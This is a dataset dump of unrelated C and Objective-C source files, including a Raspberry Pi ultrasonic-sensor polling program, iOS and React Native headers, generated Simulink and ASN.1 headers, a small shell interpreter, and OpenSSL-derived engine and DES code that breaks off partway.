text
stringlengths
6
1.35M
#include "cart.h"
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>

#define max_dis 2000                /* maximum measured distance, cm */
#define timeOut (max_dis*60)        /* echo timeout in us, derived from max distance
                                     * (parenthesized so the macro expands safely) */
#define NUM_SONARS 6                /* number of trig/echo sensor pairs wired up */

/* pulseIn: measure, in microseconds, how long `pin` stays at `level`;
 * returns 0 if `timeout` (us) expires while waiting or measuring. */
int pulseIn(int pin, int level, int timeout);

/*
 * getSonar: run one measurement on an HC-SR04-style ultrasonic module.
 * trigPin/echoPin: wiringPi pin numbers of the module's trigger and echo lines.
 * Returns the measured distance in cm (0 on echo timeout, since pulseIn
 * returns 0 in that case).
 */
float getSonar(int trigPin, int echoPin){
    long pingTime;
    float distance;

    /* Trigger pulse: HIGH for 10 ms via mydelay (well above the module's
     * 10 us minimum), then back LOW. */
    digitalWrite(trigPin,HIGH);
    mydelay(10);
    digitalWrite(trigPin,LOW);

    pingTime = pulseIn(echoPin,HIGH,timeOut);       /* echo high time, us */
    /* distance = time * speed of sound / 2 (round trip);
     * 340 m/s == 0.034 cm/us, hence the /10000 scaling. */
    distance = (float)pingTime*340.0/2.0/10000.0;
    return distance;
}

/* init_pins2: set every trigger pin to OUTPUT and every echo pin to INPUT. */
void init_pins2(){
    const int trigPins[NUM_SONARS] = {trigPin1, trigPin2, trigPin3,
                                      trigPin4, trigPin5, trigPin6};
    const int echoPins[NUM_SONARS] = {echoPin1, echoPin2, echoPin3,
                                      echoPin4, echoPin5, echoPin6};
    int i;

    for (i = 0; i < NUM_SONARS; i++) {
        pinMode(trigPins[i], OUTPUT);
        pinMode(echoPins[i], INPUT);
    }
}

/*
 * main: poll all six ultrasonic sensors forever, rewriting
 * /var/lib/cart/dists.txt with one distance (cm) per line every ~50 ms.
 */
int main(){
    const int trigPins[NUM_SONARS] = {trigPin1, trigPin2, trigPin3,
                                      trigPin4, trigPin5, trigPin6};
    const int echoPins[NUM_SONARS] = {echoPin1, echoPin2, echoPin3,
                                      echoPin4, echoPin5, echoPin6};
    float distance;
    FILE *fp;
    int i;

    printf("Program starting...\n");
    wiringPiSetup();
    init_pins2();

    while(1){
        fp = fopen("/var/lib/cart/dists.txt","w");
        if(fp == NULL){
            printf("Error opening file...");
            exit(-1);
        }
        for (i = 0; i < NUM_SONARS; i++) {
            distance = getSonar(trigPins[i], echoPins[i]);
            /* "%g" prints 6 significant digits, matching the old gcvt(x,6,buf)
             * (gcvt is nonstandard/deprecated).  Every reading now gets a
             * trailing newline — the original omitted it on the last one. */
            fprintf(fp, "%g\n", distance);
        }
        fclose(fp);
        mydelay(50);
    }
    return 0;
}

int pulseIn(int pin, int level, int timeout)
{
    struct timeval tn, t0, t1;
    long micros;

    gettimeofday(&t0, NULL);
    /* Wait for the pin to reach `level`.
     * Fix: elapsed time is computed from the full tv_sec difference; the old
     * code added a flat 1000000 whenever tv_sec differed at all, which was
     * wrong for spans of 2+ seconds and on tv_sec wrap-around. */
    while (digitalRead(pin) != level) {
        gettimeofday(&tn, NULL);
        micros = (tn.tv_sec - t0.tv_sec) * 1000000L
               + (tn.tv_usec - t0.tv_usec);
        if (micros > timeout)
            return 0;
    }

    /* t1 marks the start of the pulse; time the whole high (or low) phase,
     * still bounding the total wait by `timeout` measured from t0. */
    gettimeofday(&t1, NULL);
    while (digitalRead(pin) == level) {
        gettimeofday(&tn, NULL);
        micros = (tn.tv_sec - t0.tv_sec) * 1000000L
               + (tn.tv_usec - t0.tv_usec);
        if (micros > timeout)
            return 0;
    }

    /* Pulse width = last sample time minus pulse start (same tv_sec fix). */
    return (tn.tv_sec - t1.tv_sec) * 1000000L
         + (tn.tv_usec - t1.tv_usec);
}
//
//  UINavigationController+RVFullscreenPopGesture.h
//  vsp-vk-iOS
//
//  Created by 蔡宇航 on 2022/1/12.
//

#import <UIKit/UIKit.h>

NS_ASSUME_NONNULL_BEGIN

// Category on UINavigationController; declares no public methods here —
// its behavior is supplied entirely by the implementation file.
@interface UINavigationController (RVFullscreenPopGesture)

@end

NS_ASSUME_NONNULL_END
/* * File: rtGetInf.h * * Code generated for Simulink model 'Mount_Drv_PDR2021'. * * Model version : 1.901 * Simulink Coder version : 9.0 (R2018b) 24-May-2018 * C/C++ source code generated on : Tue Aug 24 14:59:10 2021 * * Target selection: ert.tlc * Embedded hardware selection: Intel->x86-64 (Linux 64) * Code generation objectives: Unspecified * Validation result: Not run */ #ifndef RTW_HEADER_rtGetInf_h_ #define RTW_HEADER_rtGetInf_h_ #include <stddef.h> #include "rtwtypes.h" #include "rt_nonfinite.h" extern real_T rtGetInf(void); extern real32_T rtGetInfF(void); extern real_T rtGetMinusInf(void); extern real32_T rtGetMinusInfF(void); #endif /* RTW_HEADER_rtGetInf_h_ */ /* * File trailer for generated code. * * [EOF] */
/* * Generated by asn1c-0.9.24 (http://lionet.info/asn1c) * From ASN.1 module "X2AP-IEs" * found in "/home/oainuc2/openairinterface5g/openair2/X2AP/MESSAGES/ASN1/R11.2/X2AP-IEs.asn" * `asn1c -gen-PER` */ #ifndef _X2ap_Pre_emptionVulnerability_H_ #define _X2ap_Pre_emptionVulnerability_H_ #include <asn_application.h> /* Including external dependencies */ #include <NativeEnumerated.h> #ifdef __cplusplus extern "C" { #endif /* Dependencies */ typedef enum X2ap_Pre_emptionVulnerability { X2ap_Pre_emptionVulnerability_not_pre_emptable = 0, X2ap_Pre_emptionVulnerability_pre_emptable = 1 } e_X2ap_Pre_emptionVulnerability; /* X2ap-Pre-emptionVulnerability */ typedef long X2ap_Pre_emptionVulnerability_t; /* Implementation */ extern asn_TYPE_descriptor_t asn_DEF_X2ap_Pre_emptionVulnerability; asn_struct_free_f X2ap_Pre_emptionVulnerability_free; asn_struct_print_f X2ap_Pre_emptionVulnerability_print; asn_constr_check_f X2ap_Pre_emptionVulnerability_constraint; ber_type_decoder_f X2ap_Pre_emptionVulnerability_decode_ber; der_type_encoder_f X2ap_Pre_emptionVulnerability_encode_der; xer_type_decoder_f X2ap_Pre_emptionVulnerability_decode_xer; xer_type_encoder_f X2ap_Pre_emptionVulnerability_encode_xer; per_type_decoder_f X2ap_Pre_emptionVulnerability_decode_uper; per_type_encoder_f X2ap_Pre_emptionVulnerability_encode_uper; per_type_decoder_f X2ap_Pre_emptionVulnerability_decode_aper; per_type_encoder_f X2ap_Pre_emptionVulnerability_encode_aper; type_compare_f X2ap_Pre_emptionVulnerability_compare; #ifdef __cplusplus } #endif #endif /* _X2ap_Pre_emptionVulnerability_H_ */ #include <asn_internal.h>
/* Copyright 2011 Etay Meiri This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. */ #ifndef TEXTURE_H #define TEXTURE_H #include <string> #include <GL/glew.h> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/highgui/highgui.hpp> class Texture { public: Texture(GLenum TextureTarget, const std::string& FileName); bool Load(); void Bind(GLenum TextureUnit); private: std::string m_fileName; GLenum m_textureTarget; GLuint m_textureObj; cv::Mat m_cv_image; }; #endif /* TEXTURE_H */
/*
 * Copyright (c) 2001-2019, Arm Limited and Contributors. All rights reserved.
 *
 * SPDX-License-Identifier: BSD-3-Clause OR Arm's non-OSI source license
 *
 */

/*!
 @file
 @brief This file contains the definitions and APIs for Secure SRAM operations.
        This is a placeholder for platform-specific Secure SRAM implementation.
*/

/*!
 @defgroup cc_pal_secure_sram CryptoCell PAL SECURE SRAM APIs
 @brief Contains PAL SECURE SRAM APIs. See cc_pal_secure_sram.h.
 @{
 @ingroup cc_pal
 @}
*/

#ifndef _CC_PAL_SECURE_SRAM_H
#define _CC_PAL_SECURE_SRAM_H

/* Fix: uint32_t is used below but the header previously relied on the
 * includer to provide it; include <stdint.h> so the header is
 * self-contained. */
#include <stdint.h>

/*!
  @brief Reads a word from a specific address in the secure SRAM and writes it
         to a specific address in OTP or to a shadow register.
         The read of the word is done in-direct and the write of the word is
         implemented with inline assembler. It is implemented this way in order
         to bypass the stack and not leave in it parts of the secrets.
         An external loop needs to call this API 4 times in a row.

  @return None
 */
void CC_PalCopyWordFromSecureSram(unsigned long srcRegAddr, unsigned long destRegAddr);

/*!
  @brief Reads a word from a specific address in the secure SRAM and checks
         whether it is all 0's or 1's.
         The read of the word is done in-direct and the comparison of the word
         is implemented with inline assembler. It is implemented this way in
         order to bypass the stack and not leave in it parts of the secrets.
         An external loop needs to call this API 4 times in a row.

  @return CC_OK
 */
uint32_t CC_PalIsSramWordValid(unsigned long srcAddr, uint32_t cmpValue);

/*!
  @brief Reads a word from the register at srcAddr.
         NOTE(review): undocumented in the original header; presumably a
         side-effect-only read like the APIs above — confirm against the
         platform implementation.
 */
void CC_PalReadWordFromReg(unsigned long srcAddr);

#endif
/*
 * Copyright (c) Facebook, Inc. and its affiliates.
 *
 * This source code is licensed under the MIT license found in the
 * LICENSE file in the root directory of this source tree.
 */

#import <ABI39_0_0React/ABI39_0_0RCTShadowView.h>

#import "ABI39_0_0RCTTextAttributes.h"

NS_ASSUME_NONNULL_BEGIN

extern NSString *const ABI39_0_0RCTBaseTextShadowViewEmbeddedShadowViewAttributeName;

// Shadow view that produces an NSAttributedString from its text attributes;
// subclasses may reuse the two cached ivars to avoid recomputation.
@interface ABI39_0_0RCTBaseTextShadowView : ABI39_0_0RCTShadowView {
 @protected
  NSAttributedString *_Nullable cachedAttributedText;
 @protected
  ABI39_0_0RCTTextAttributes *_Nullable cachedTextAttributes;
}

@property (nonatomic, strong) ABI39_0_0RCTTextAttributes *textAttributes;

// Builds the attributed string, merging the given base attributes (may be nil).
- (NSAttributedString *)attributedTextWithBaseTextAttributes:
    (nullable ABI39_0_0RCTTextAttributes *)baseTextAttributes;

@end

NS_ASSUME_NONNULL_END
// This toolbox is licensed under the Academic Free License 3.0. // Instituto Tecnológico de Buenos Aires (ITBA). // Last modification: December 19th, 2012. #ifndef GRAPH_GENERATOR_H #define GRAPH_GENERATOR_H #include "../ComplexNets/typedefs.h" #include "../ComplexNets/MolloyReedGraphReader.h" using namespace std; class GraphGenerator { private: typedef struct PolarPosition { double r; double theta; } PolarPosition; GraphGenerator(); static GraphGenerator *instance; float distanceBetweenVertex(unsigned int vertex1Id, unsigned int vertex2Id); void addVertexPosition(); void addEdges(Graph* graph, Vertex* vertex, map<float, unsigned int> distance, unsigned int quant, vector<unsigned int>* vertexIndexes); inline double hiperbolicDistance(PolarPosition p1, PolarPosition p2); inline double getMaxRadius(int i, float a, float c); inline PolarPosition getRandomHyperbolicCoordinates( float a, double maxr ); public: static GraphGenerator *getInstance(); Graph *generateGraphFromFile(string path, bool directed, bool multigraph); DirectedGraph *generateDirectedGraphFromFile(string path, bool multigraph); WeightedGraph *generateWeightedGraphFromFile(string path, bool directed, bool multigraph); Graph* generateErdosRenyiGraph(unsigned int n, float p); Graph* generateBarabasiAlbertGraph(unsigned int m_0, unsigned int m, unsigned int n); Graph* generateHotExtendedGraph(unsigned int m, unsigned int n, float xi, unsigned int q, float r); Graph* generateMolloyReedGraph(string path); Graph* generateHiperbolicGraph(unsigned int n, float a, float c); double getExpectedAvgNodeDeg(unsigned int n, float a, float c); }; #endif
/* * Copyright (C) 2013 Google Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * Neither the name of Google Inc. nor the names of its * contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ #ifndef PrerenderHandle_h #define PrerenderHandle_h #include "core/dom/DocumentLifecycleObserver.h" #include "platform/heap/Handle.h" #include "platform/weborigin/KURL.h" #include "wtf/Noncopyable.h" #include "wtf/PassOwnPtr.h" #include "wtf/PassRefPtr.h" namespace blink { class Document; class Prerender; class PrerenderClient; class PrerenderHandle final : public NoBaseWillBeGarbageCollectedFinalized<PrerenderHandle>, public DocumentLifecycleObserver { WILL_BE_USING_GARBAGE_COLLECTED_MIXIN(PrerenderHandle); USING_FAST_MALLOC_WILL_BE_REMOVED(PrerenderHandle); WTF_MAKE_NONCOPYABLE(PrerenderHandle); public: static PassOwnPtrWillBeRawPtr<PrerenderHandle> create(Document&, PrerenderClient*, const KURL&, unsigned prerenderRelTypes); virtual ~PrerenderHandle(); void cancel(); const KURL& url() const; // From DocumentLifecycleObserver: void documentWasDetached() override; DECLARE_VIRTUAL_TRACE(); private: PrerenderHandle(Document&, PassRefPtr<Prerender>); void detach(); RefPtr<Prerender> m_prerender; }; } #endif // PrerenderHandle_h
/* * Copyright (c) 2016 Mytchel Hammond <mytchel@openmailbox.org> * * Permission is hereby granted, free of charge, to any person * obtaining a copy of this software and associated documentation * files (the "Software"), to deal in the Software without * restriction, including without limitation the rights to use, * copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following * conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES * OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. 
* */ #include <libc.h> #include <string.h> #include "shell.h" int ret = 0; void shiftstringright(char *s, size_t max, size_t i) { size_t j; j = max - 1; while (j > i) { s[j] = s[j-1]; j--; } } void shiftstringleft(char *s, size_t max) { size_t j; j = 0; while (j < max) { s[j] = s[j + 1]; j++; } } void interp(void) { char line[LINEMAX]; struct token *t; size_t b, m, i; int p[2]; bool q; char c; int r; while (true) { prompt: write(STDOUT, "; ", 2); q = false; b = m = i = 0; while ((r = read(STDIN, &c, sizeof(char))) > 0) { if (c == 127 || c == 8) { if (i > 0) { i--; shiftstringleft(&line[i], m - i); } continue; } else if (i == sizeof(line)) { printf("line length exceded!\n"); goto prompt; } line[i] = c; i++; if (i > m) { m = i; } if (c == '(' || c == '{' || c == '[') { b++; } else if (c == ')' || c == '}' || c == ']') { b--; } else if (c == '\'') { q = !q; } else if (!q && b == 0 && c == '\n' && (i == 0 || line[i-1] != '\\')) { break; } } if (r == 0) { exit(OK); } else if (r < 0) { printf("error reading input: %i\n", r); exit(r); } if (pipe(p) != OK) { printf("pipe error\n"); exit(ERR); } setupinputstring(line, m); while ((t = command(0)) != nil) { ret = types[t->type].eval(t, STDIN, STDOUT); types[t->type].free(t); } } }
//
//  SDWebImageManager+Custom.h
//  weixindress
//
//  Created by 杨帆 on 16/3/21.
//  Copyright © 2016年 www.jd.com. All rights reserved.
//

#import "SDWebImageManager.h"

// Category adding a swizzle hook and a WEBP-specific variant of
// SDWebImageManager's download entry point.
@interface SDWebImageManager (Custom)

// Swizzled replacement for downloadImageWithURL:options:progress:completed:.
- (id <SDWebImageOperation>)customSwizzle_downloadImageWithURL:(NSURL *)url
                                                       options:(SDWebImageOptions)options
                                                      progress:(SDWebImageDownloaderProgressBlock)progressBlock
                                                     completed:(SDWebImageCompletionWithFinishedBlock)completedBlock;

// Download entry point for WEBP images; same shape as the standard API.
- (id <SDWebImageOperation>)downloadWEBPImageWithURL:(NSURL *)url
                                             options:(SDWebImageOptions)options
                                            progress:(SDWebImageDownloaderProgressBlock)progressBlock
                                           completed:(SDWebImageCompletionWithFinishedBlock)completedBlock;

@end
/* $OpenBSD: eng_all.c,v 1.25 2014/06/12 15:49:29 deraadt Exp $ */ /* Written by Richard Levitte <richard@levitte.org> for the OpenSSL * project 2000. */ /* ==================================================================== * Copyright (c) 2000-2001 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * licensing@OpenSSL.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ #include "cryptlib.h" #include "eng_int.h" void ENGINE_load_builtin_engines(void) { /* Some ENGINEs need this */ OPENSSL_cpuid_setup(); #if 0 /* There's no longer any need for an "openssl" ENGINE unless, one day, * it is the *only* way for standard builtin implementations to be be * accessed (ie. it would be possible to statically link binaries with * *no* builtin implementations). */ ENGINE_load_openssl(); #endif #ifndef OPENSSL_NO_RSAX ENGINE_load_rsax(); #endif ENGINE_load_dynamic(); #ifndef OPENSSL_NO_STATIC_ENGINE #ifndef OPENSSL_NO_HW #ifndef OPENSSL_NO_HW_PADLOCK ENGINE_load_padlock(); #endif #endif #endif ENGINE_register_all_complete(); }
/* crypto/des/des_enc.c */ /* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com) * All rights reserved. * * This package is an SSL implementation written * by Eric Young (eay@cryptsoft.com). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial and non-commercial use as long as * the following conditions are aheared to. The following conditions * apply to all code found in this distribution, be it the RC4, RSA, * lhash, DES, etc., code; not just the SSL code. The SSL documentation * included with this distribution is covered by the same copyright terms * except that the holder is Tim Hudson (tjh@cryptsoft.com). * * Copyright remains Eric Young's, and as such any Copyright notices in * the code are not to be removed. * If this package is used in a product, Eric Young should be given attribution * as the author of the parts of the library used. * This can be in the form of a textual message at program startup or * in documentation (online or textual) provided with the package. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * "This product includes cryptographic software written by * Eric Young (eay@cryptsoft.com)" * The word 'cryptographic' can be left out if the rouines from the library * being used are not cryptographic related :-). * 4. 
If you include any Windows specific code (or a derivative thereof) from * the apps directory (application code) you must include an acknowledgement: * "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" * * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * The licence and distribution terms for any publically available version or * derivative of this code cannot be changed.  i.e. this code cannot simply be * copied and put under another distribution licence * [including the GNU Public Licence.] */ #include "des_locl.h" #include "spr.h" void DES_encrypt1(DES_LONG *data, DES_key_schedule *ks, int enc) { register DES_LONG l,r,t,u; #ifdef DES_PTR register const unsigned char *des_SP=(const unsigned char *)DES_SPtrans; #endif #ifndef DES_UNROLL register int i; #endif register DES_LONG *s; r=data[0]; l=data[1]; IP(r,l); /* Things have been modified so that the initial rotate is * done outside the loop.  This required the * DES_SPtrans values in sp.h to be rotated 1 bit to the right. * One perl script later and things have a 5% speed up on a sparc2. * Thanks to Richard Outerbridge <71755.204@CompuServe.COM> * for pointing this out.
*/ /* clear the top bits on machines with 8byte longs */ /* shift left by 2 */ r=ROTATE(r,29)&0xffffffffL; l=ROTATE(l,29)&0xffffffffL; s=ks->ks->deslong; /* I don't know if it is worth the effort of loop unrolling the * inner loop */ if (enc) { #ifdef DES_UNROLL D_ENCRYPT(l,r, 0); /*  1 */ D_ENCRYPT(r,l, 2); /*  2 */ D_ENCRYPT(l,r, 4); /*  3 */ D_ENCRYPT(r,l, 6); /*  4 */ D_ENCRYPT(l,r, 8); /*  5 */ D_ENCRYPT(r,l,10); /*  6 */ D_ENCRYPT(l,r,12); /*  7 */ D_ENCRYPT(r,l,14); /*  8 */ D_ENCRYPT(l,r,16); /*  9 */ D_ENCRYPT(r,l,18); /*  10 */ D_ENCRYPT(l,r,20); /*  11 */ D_ENCRYPT(r,l,22); /*  12 */ D_ENCRYPT(l,r,24); /*  13 */ D_ENCRYPT(r,l,26); /*  14 */ D_ENCRYPT(l,r,28); /*  15 */ D_ENCRYPT(r,l,30); /*  16 */ #else for (i=0; i<32; i+=4) { D_ENCRYPT(l,r,i+0); /*  1 */ D_ENCRYPT(r,l,i+2); /*  2 */ } #endif } else { #ifdef DES_UNROLL D_ENCRYPT(l,r,30); /* 16 */ D_ENCRYPT(r,l,28); /* 15 */ D_ENCRYPT(l,r,26); /* 14 */ D_ENCRYPT(r,l,24); /* 13 */ D_ENCRYPT(l,r,22); /* 12 */ D_ENCRYPT(r,l,20); /* 11 */ D_ENCRYPT(l,r,18); /* 10 */ D_ENCRYPT(r,l,16); /* 9 */ D_ENCRYPT(l,r,14); /* 8 */ D_ENCRYPT(r,l,12); /* 7 */ D_ENCRYPT(l,r,10); /* 6 */ D_ENCRYPT(r,l, 8); /* 5 */ D_ENCRYPT(l,r, 6); /* 4 */ D_ENCRYPT(r,l, 4); /* 3 */ D_ENCRYPT(l,r, 2); /* 2 */ D_ENCRYPT(r,l, 0); /* 1 */ #else for (i=30; i>0; i-=4) { D_ENCRYPT(l,r,i-0); /* 16 */ D_ENCRYPT(r,l,i-2); /* 15 */ } #endif } /* rotate and clear the top bits on machines with 8byte longs */ l=ROTATE(l,3)&0xffffffffL; r=ROTATE(r,3)&0xffffffffL; FP(r,l); data[0]=l; data[1]=r; l=r=t=u=0; } void DES_encrypt2(DES_LONG *data, DES_key_schedule *ks, int enc) { register DES_LONG l,r,t,u; #ifdef DES_PTR register const unsigned char *des_SP=(const unsigned char *)DES_SPtrans; #endif #ifndef DES_UNROLL register int i; #endif register DES_LONG *s; r=data[0]; l=data[1]; /* Things have been modified so that the initial rotate is * done outside the loop.  This required the * DES_SPtrans values in sp.h to be rotated 1 bit to the right.
* One perl script later and things have a 5% speed up on a sparc2. * Thanks to Richard Outerbridge <71755.204@CompuServe.COM> * for pointing this out. */ /* clear the top bits on machines with 8byte longs */ r=ROTATE(r,29)&0xffffffffL; l=ROTATE(l,29)&0xffffffffL; s=ks->ks->deslong; /* I don't know if it is worth the effort of loop unrolling the * inner loop */ if (enc) { #ifdef DES_UNROLL D_ENCRYPT(l,r, 0); /*  1 */ D_ENCRYPT(r,l, 2); /*  2 */ D_ENCRYPT(l,r, 4); /*  3 */ D_ENCRYPT(r,l, 6); /*  4 */ D_ENCRYPT(l,r, 8); /*  5 */ D_ENCRYPT(r,l,10); /*  6 */ D_ENCRYPT(l,r,12); /*  7 */ D_ENCRYPT(r,l,14); /*  8 */ D_ENCRYPT(l,r,16); /*  9 */ D_ENCRYPT(r,l,18); /*  10 */ D_ENCRYPT(l,r,20); /*  11 */ D_ENCRYPT(r,l,22); /*  12 */ D_ENCRYPT(l,r,24); /*  13 */ D_ENCRYPT(r,l,26); /*  14 */ D_ENCRYPT(l,r,28); /*  15 */ D_ENCRYPT(r,l,30); /*  16 */ #else for (i=0; i<32; i+=4) { D_ENCRYPT(l,r,i+0); /*  1 */ D_ENCRYPT(r,l,i+2); /*  2 */ } #endif } else { #ifdef DES_UNROLL D_ENCRYPT(l,r,30); /* 16 */ D_ENCRYPT(r,l,28); /* 15 */ D_ENCRYPT(l,r,26); /* 14 */ D_ENCRYPT(r,l,24); /* 13 */ D_ENCRYPT(l,r,22); /* 12 */ D_ENCRYPT(r,l,20); /* 11 */ D_ENCRYPT(l,r,18); /* 10 */ D_ENCRYPT(r,l,16); /* 9 */ D_ENCRYPT(l,r,14); /* 8 */ D_ENCRYPT(r,l,12); /* 7 */ D_ENCRYPT(l,r,10); /* 6 */ D_ENCRYPT(r,l, 8); /* 5 */ D_ENCRYPT(l,r, 6); /* 4 */ D_ENCRYPT(r,l, 4); /* 3 */ D_ENCRYPT(l,r, 2); /* 2 */ D_ENCRYPT(r,l, 0); /* 1 */ #else for (i=30; i>0; i-=4) { D_ENCRYPT(l,r,i-0); /* 16 */ D_ENCRYPT(r,l,i-2); /* 15 */ } #endif } /* rotate and clear the top bits on machines with 8byte longs */ data[0]=ROTATE(l,3)&0xffffffffL; data[1]=ROTATE(r,3)&0xffffffffL; l=r=t=u=0; } void DES_encrypt3(DES_LONG *data, DES_key_schedule *ks1, DES_key_schedule *ks2, DES_key_schedule *ks3) { register DES_LONG l,r; l=data[0]; r=data[1]; IP(l,r); data[0]=l; data[1]=r; DES_encrypt2((DES_LONG *)data,ks1,DES_ENCRYPT); DES_encrypt2((DES_LONG *)data,ks2,DES_DECRYPT); DES_encrypt2((DES_LONG *)data,ks3,DES_ENCRYPT); l=data[0]; r=data[1]; FP(r,l);
/* store the final-permuted halves of DES_encrypt3; DES_decrypt3 (EDE3
 * decrypt: ks3 decrypt, ks2 encrypt, ks1 decrypt) and the CBC helpers
 * follow in this flattened source. */
